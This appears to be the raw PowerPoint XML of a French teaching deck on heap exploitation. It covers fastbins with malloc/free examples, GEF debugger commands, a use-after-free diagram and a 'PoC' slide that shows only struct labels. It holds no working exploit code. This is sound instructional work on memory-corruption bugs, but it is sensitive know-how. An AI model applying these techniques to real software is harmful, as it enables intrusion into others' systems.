          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4551708" y="5805264"/>
            <a:ext cx="46686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1E112C08-0C2B-4DCC-A05D-57628E975477}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5287889" y="431081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0x10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757A8126-5402-48FA-87C5-BF84C04CAC1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9296912" y="430182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0x10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9B385239-2508-40F5-8213-6650AC5F5309}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6578718" y="580526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0x20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172F0FDB-2B23-4B26-8C92-922F6E3FDB70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1579477" y="1600200"/>
            <a:ext cx="9413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char* A = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>malloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>(4)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char* B = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>malloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>(4)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free(A)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Flèche : chevron 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B21E562F-02BA-44A7-98A9-5C7311CF17A3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7" name="Flèche : chevron 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39E44D35-338B-467F-AB0A-89EFC14D8ED1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28" name="Flèche : chevron 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A70AD2B-2CE6-459A-8885-5B7B22B508AF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9" name="Flèche : chevron 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D66CF18-A5B5-4BC1-9A15-92D7F454FF37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1" name="Flèche : chevron 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B841B51-7F9A-4A62-918F-48997649C746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32" name="Flèche : chevron 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70D74E84-52F8-471D-9640-98047064D306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1319200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DAB388-7168-4960-A07C-8A09E3EB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/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Fastbins</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>example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16368B-C8F3-44F4-8149-E4566A1AE1FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1579477" y="3429000"/>
            <a:ext cx="18002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D38B6B-071C-4CEE-9565-6C0092F2FA37}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1579477" y="3861048"/>
            <a:ext cx="18002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7CFC661-8052-42E4-8A47-FBBDBD696B0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571365" y="3429000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 : 0x10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8F60422-C287-465F-BDF5-A2B725F13870}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571365" y="3892406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: 0x20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3574293-AC5A-4BFD-933A-7C2BF7C97375}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="606861" y="4393704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B859D2-B103-4B96-A9C5-E4102114B1BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4947752" y="4795672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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="Connecteur : en angle 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97DC3638-B824-423E-937D-F3F3583A8D87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="5" idx="3"/>
            <a:endCxn id="40" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3379677" y="4077072"/>
            <a:ext cx="1172031" cy="1151388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82DFA23-7A73-4846-B702-C48CE1B450A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5376921" y="3332450"/>
            <a:ext cx="1371030" cy="86570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830778D-409A-40E8-A150-D96109C874C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9296912" y="3331860"/>
            <a:ext cx="1356442" cy="8634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C2031D-65AF-4AB0-B61E-6DC8BC81EF9F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5343796" y="4795672"/>
            <a:ext cx="3876572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6147BB0-D154-430B-A67C-B611DD634689}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4556731" y="3331860"/>
            <a:ext cx="396044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F263045-42F6-400A-8048-3EDF149A29E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8476497" y="3331860"/>
            <a:ext cx="396044" cy="8634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1DB1DD5-2408-47C8-9876-B20003BB345A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4551708" y="4795672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FCAAA752-5940-4930-B765-F5E03B4E11DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4551708" y="4303567"/>
            <a:ext cx="2196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F83A72AC-7AB9-4A4C-B2FF-634971CF0285}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8476497" y="4298658"/>
            <a:ext cx="2196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336D1C29-B644-4D71-8719-7DEF234F5CE0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4551708" y="5805264"/>
            <a:ext cx="46686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1E112C08-0C2B-4DCC-A05D-57628E975477}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5287889" y="431081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0x10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757A8126-5402-48FA-87C5-BF84C04CAC1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9296912" y="430182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0x10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9B385239-2508-40F5-8213-6650AC5F5309}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6578718" y="580526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0x20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172F0FDB-2B23-4B26-8C92-922F6E3FDB70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1579477" y="1600200"/>
            <a:ext cx="9413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char* A = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>malloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>(4)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char* B = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>malloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>(4)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free(A)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free(B)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="24" name="Connecteur : en angle 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D7ECDA8-33F8-4F7A-A5D6-C21208A4F55F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="4" idx="3"/>
            <a:endCxn id="36" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3379677" y="3331860"/>
            <a:ext cx="5294842" cy="313164"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val 11214"/>
              <a:gd name="adj2" fmla="val 261397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71E7E44-DE47-4973-8686-DBB46EB179C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8872541" y="3331859"/>
            <a:ext cx="424371" cy="8634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E4C0119-5B3B-4E7D-98D7-390B54A974C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4952550" y="3331859"/>
            <a:ext cx="424371" cy="86342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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="35" name="Connecteur : en angle 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A352F2A3-CB03-4492-84EF-FA4275A646F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="27" idx="0"/>
            <a:endCxn id="33" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="7124732" y="1371863"/>
            <a:ext cx="12700" cy="3919991"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 6688079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lèche : chevron 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B3DCC63-C45B-4573-9381-97343EBC6A4B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9" name="Flèche : chevron 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A3DA9B5-4C0E-4591-8CDF-8C9B70D3575B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31" name="Flèche : chevron 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57E6C58F-FDC1-4A68-B4E7-B85AC96D5968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2" name="Flèche : chevron 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAAF9A71-C154-4D07-9F54-C8986A93AC81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7" name="Flèche : chevron 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A74577A-0E2F-4707-BBAE-829BA160D646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38" name="Flèche : chevron 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B19847A5-9F39-4365-A893-27358D882350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655269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A015B0-9C15-411B-AE3A-A7E9F27EA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GEF: GDB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Enhanced</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Features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F5BC46-14D7-4027-860B-49A8960BD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1456184"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Supporte : x86/x64, ARMv5/6/7, AARCH64,SPARC, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>MIPS,PowerPC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>, …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>heap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>chunks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> &lt;LOCATION&gt; : affiche les informations sur un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>chunk</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>heap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>bins</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> fast : affiche les </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>fastbins</a:t>
            </a:r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AD6C6FE-5A8D-4D8D-B300-92B9D74A09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22650" y="3429000"/>
            <a:ext cx="11746700" cy="1728192"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Flèche : chevron 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7834785-D970-474B-8554-9D5347AEC506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lèche : chevron 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EBE893F1-DBD0-4932-8076-4783E306B1E3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7" name="Flèche : chevron 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6605FA5C-F608-4735-AAAE-C85FFA864A69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Flèche : chevron 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C0448E0-EC22-4C12-B1B2-709667BF7BFD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5C3FD62D-141D-4C7C-A8DD-C43D16BEA003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450FFD86-3D85-457D-95B9-94E18B6C9836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1290824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B36794-A8C3-4614-8D97-E116134EE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Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>after</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> free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3AC649-CE9D-4F36-AA95-E054F0A93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448072"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Utilisation d’un « objet » qui a été free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567A1A0-C330-42AC-ACAF-C3438C99B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2276872"/>
            <a:ext cx="7056784" cy="3424382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9C69A58-45F9-4B06-ABA7-FB902D4521FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7752184" y="4725144"/>
            <a:ext cx="13681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B61F45B-617A-4963-BF02-F89924BE8F5A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9120336" y="4437112"/>
            <a:ext cx="2952328" cy="576064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fr-FR" dirty="0"/>
              <a:t>collection[index] ! = NULL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FA04F1-5404-4D62-A97E-A68988C84865}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1703512" y="5709460"/>
            <a:ext cx="1675308" cy="44807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0xXXXXXXXX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91980A-51C4-45E0-8CAF-8925F49CCDE6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3378820" y="5709460"/>
            <a:ext cx="1675308" cy="4480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NULL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61F884-BA1F-42F7-B22D-1B483B8ACA24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5054128" y="5709460"/>
            <a:ext cx="1675308" cy="4480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NULL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07544B-0EC8-4798-A72A-956206815D0C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6729436" y="5709460"/>
            <a:ext cx="1675308" cy="4480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NULL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020965-D0AA-4FB9-A27F-7E65257614BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8420360" y="5709460"/>
            <a:ext cx="1675308" cy="4480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…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6F89542-B6C1-4387-B222-3B7E895D316D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228948" y="570946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collection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362790-027E-4332-B5C1-5615FE5B2AC4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2845966" y="6295264"/>
            <a:ext cx="1675308" cy="448072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+mj-lt"/>
              </a:rPr>
              <a:t>hat</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp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id="{B0B7368C-226A-47EE-A678-1DEF6DA47B59}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="9" idx="2"/>
            <a:endCxn id="15" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="2512682" y="6186016"/>
            <a:ext cx="361768" cy="304800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Flèche : chevron 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A38F265-287A-4713-8289-4D7355E341E4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4" name="Flèche : chevron 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1EBCD0E3-FDA9-4705-BCEE-438156E74855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25" name="Flèche : chevron 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90E0D84D-F805-4B30-B702-A5F589492A3A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6" name="Flèche : chevron 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56C7EC26-9164-492D-8114-6B7D8D66BFD6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7" name="Flèche : chevron 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E992FE1B-F55A-4204-8FAF-A2804E6BAE82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28" name="Flèche : chevron 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4023DC5F-85B9-479B-9119-886B4E5A09A8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F88A7CBD-D676-4834-8927-EBA9955DCD72}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="171257" y="6301566"/>
            <a:ext cx="740167" cy="43204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x86</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="93697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B36794-A8C3-4614-8D97-E116134EE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Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>after</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> free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973DA6-DCFD-47D9-9BA8-0A1CCCA85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11040"/>
            <a:ext cx="9612560" cy="4083768"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Flèche : chevron 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{765CDFAC-BF8F-4B48-AE64-4CCE23024FD7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lèche : chevron 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB5E8227-31B8-4B54-9EDF-C09872A6AF56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7" name="Flèche : chevron 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9CE0EA9-763E-4C3F-8FF0-3AF142C8EB4E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Flèche : chevron 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6CDF94B5-8441-4CB9-92E1-FD5F44A5357D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9620087A-837F-42EB-9279-8AEAA12DCBBC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66102E06-A6FF-4847-A19C-7D12B758F9EE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78897E-56D2-4353-95E4-419FC2D53D0B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3431704" y="3140968"/>
            <a:ext cx="7704856" cy="2088232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1909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70F7B7-19CA-46D9-8667-DEF3FDB1A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Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>after</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> free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333639-C9B1-44F0-B150-10BD9D1F0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448072"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>PoC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6572AA-45FE-4509-BE8C-31DD04F787DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4259288" y="2341966"/>
            <a:ext cx="1619672" cy="3270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green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48EF13-D362-412F-861B-B8AA36713D0B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2639616" y="2341966"/>
            <a:ext cx="1619672" cy="3270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struct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>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5BB06E-735C-4B16-960C-3AC7161E253C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4259288" y="2833054"/>
            <a:ext cx="1619672" cy="304626"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:pattFill prst="wdUpDiag">
            <a:fgClr>
              <a:schemeClr val="accent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green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F62829-B3E9-4B7E-8374-F56847828EF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2639616" y="2833054"/>
            <a:ext cx="1619672" cy="304626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struct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>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3176269-DBB0-444F-B631-207F853962D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5500846" y="278122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(1)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5705F06-7A6D-4525-8B63-46605F723A98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
